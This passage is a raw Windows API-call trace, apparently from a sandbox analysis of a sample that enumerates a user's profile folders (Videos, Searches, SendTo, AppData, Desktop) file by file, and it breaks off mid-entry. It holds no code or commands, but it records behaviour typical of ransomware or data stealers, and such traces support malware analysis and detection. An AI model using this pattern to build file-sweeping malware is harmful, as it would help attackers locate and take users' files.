FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Saved Games\\*" (normalized: "c:\\users\\keecfmwgj\\saved games\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaef8 | out: hHeap=0x620000) returned 1 [0184.966] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.966] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.966] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0184.966] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.966] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.966] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\") returned="Searches\\" [0184.966] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.966] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.967] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.967] PathFindFileNameW (pszPath="") returned="" [0184.967] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Searches\\*" (normalized: "c:\\users\\keecfmwgj\\searches\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.967] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.967] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8317a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.967] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0184.967] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0184.967] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0184.967] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.967] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.967] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\SendTo\\") returned="SendTo\\" [0184.967] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.968] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.968] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.968] PathFindFileNameW (pszPath="") returned="" [0184.968] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\SendTo\\*" (normalized: "c:\\users\\keecfmwgj\\sendto\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0184.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.968] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.968] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Start Menu\\") returned="Start Menu\\" [0184.968] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.968] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.968] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.968] PathFindFileNameW (pszPath="") returned="" [0184.968] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Start Menu\\*" (normalized: "c:\\users\\keecfmwgj\\start menu\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0184.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.969] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.969] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Templates\\") returned="Templates\\" [0184.969] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.969] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.969] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.969] PathFindFileNameW (pszPath="") returned="" [0184.969] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Templates\\*" (normalized: "c:\\users\\keecfmwgj\\templates\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0184.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.969] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.969] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0184.970] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.970] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.970] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.970] PathFindFileNameW (pszPath="") returned="" [0184.970] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9873ac90, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9873ac90, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.970] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9873ac90, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9873ac90, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.970] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3d16240, ftCreationTime.dwHighDateTime=0x1d8a3e8, ftLastAccessTime.dwLowDateTime=0x635b5f20, ftLastAccessTime.dwHighDateTime=0x1d8a5f6, ftLastWriteTime.dwLowDateTime=0x635b5f20, ftLastWriteTime.dwHighDateTime=0x1d8a5f6, nFileSizeHigh=0x0, nFileSizeLow=0xd45e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6s3WjoHyRIY3EiBz5-U.avi", cAlternateFileName="6S3WJO~1.AVI")) returned 1 [0184.970] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798ad850, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798ad850, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7e35a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.970] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1134fc0, ftCreationTime.dwHighDateTime=0x1d8a329, ftLastAccessTime.dwLowDateTime=0xf41f5970, ftLastAccessTime.dwHighDateTime=0x1d8a386, ftLastWriteTime.dwLowDateTime=0xf41f5970, ftLastWriteTime.dwHighDateTime=0x1d8a386, nFileSizeHigh=0x0, nFileSizeLow=0xeef5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hDvzuhrdv.mkv", cAlternateFileName="HDVZUH~1.MKV")) returned 1 [0184.970] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1383f500, ftCreationTime.dwHighDateTime=0x1d89d4c, ftLastAccessTime.dwLowDateTime=0xf6229e60, ftLastAccessTime.dwHighDateTime=0x1d8a063, ftLastWriteTime.dwLowDateTime=0xf6229e60, ftLastWriteTime.dwHighDateTime=0x1d8a063, nFileSizeHigh=0x0, nFileSizeLow=0x1138e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K0ZMIj7SN.mp4", cAlternateFileName="K0ZMIJ~1.MP4")) returned 1 [0184.970] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa751f480, ftCreationTime.dwHighDateTime=0x1d8a620, ftLastAccessTime.dwLowDateTime=0x20a96cf0, ftLastAccessTime.dwHighDateTime=0x1d8a6b7, ftLastWriteTime.dwLowDateTime=0x20a96cf0, ftLastWriteTime.dwHighDateTime=0x1d8a6b7, nFileSizeHigh=0x0, nFileSizeLow=0x132b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SipikwOFNhn.swf", cAlternateFileName="SIPIKW~1.SWF")) returned 1 [0184.970] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa471670, ftCreationTime.dwHighDateTime=0x1d89ebe, ftLastAccessTime.dwLowDateTime=0x8d18f590, ftLastAccessTime.dwHighDateTime=0x1d8a0a9, ftLastWriteTime.dwLowDateTime=0x8d18f590, ftLastWriteTime.dwHighDateTime=0x1d8a0a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z2E0zT", cAlternateFileName="")) returned 1 [0184.970] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa471670, ftCreationTime.dwHighDateTime=0x1d89ebe, ftLastAccessTime.dwLowDateTime=0x8d18f590, ftLastAccessTime.dwHighDateTime=0x1d8a0a9, ftLastWriteTime.dwLowDateTime=0x8d18f590, ftLastWriteTime.dwHighDateTime=0x1d8a0a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z2E0zT", cAlternateFileName="")) returned 0 [0184.970] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93ba0 | out: hHeap=0x620000) returned 1 [0184.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaad8 | out: hHeap=0x620000) returned 1 [0184.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93b58 | out: hHeap=0x620000) returned 1 [0184.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93b10 | out: hHeap=0x620000) returned 1 [0184.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93ac8 | out: hHeap=0x620000) returned 1 [0184.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93e28 | out: hHeap=0x620000) returned 1 [0184.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93e70 | out: hHeap=0x620000) returned 1 [0184.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93eb8 | out: hHeap=0x620000) returned 1 [0184.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93f00 | out: hHeap=0x620000) returned 1 [0184.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0184.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93f48 | out: hHeap=0x620000) returned 1 [0184.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0184.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93f90 | out: hHeap=0x620000) returned 1 [0184.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93fd8 | out: hHeap=0x620000) returned 1 [0184.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94020 | out: hHeap=0x620000) returned 1 [0184.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94068 | out: hHeap=0x620000) returned 1 [0184.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e940b0 | out: hHeap=0x620000) returned 1 [0184.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e940f8 | out: hHeap=0x620000) returned 1 [0184.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94140 | out: hHeap=0x620000) returned 1 [0184.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0184.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0184.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddee8 | out: hHeap=0x620000) returned 1 [0184.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0184.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0184.979] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.979] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.979] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0184.979] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0184.979] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.979] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.979] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.979] PathFindFileNameW (pszPath="") returned="" [0184.979] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0184.980] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.980] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0184.980] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0184.980] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0184.981] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.981] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.981] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\") returned="bQ6SJi8RO0rg0dP\\" [0184.981] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0184.981] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.981] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.981] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.981] PathFindFileNameW (pszPath="") returned="" [0184.981] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\bq6sji8ro0rg0dp\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa166e050, 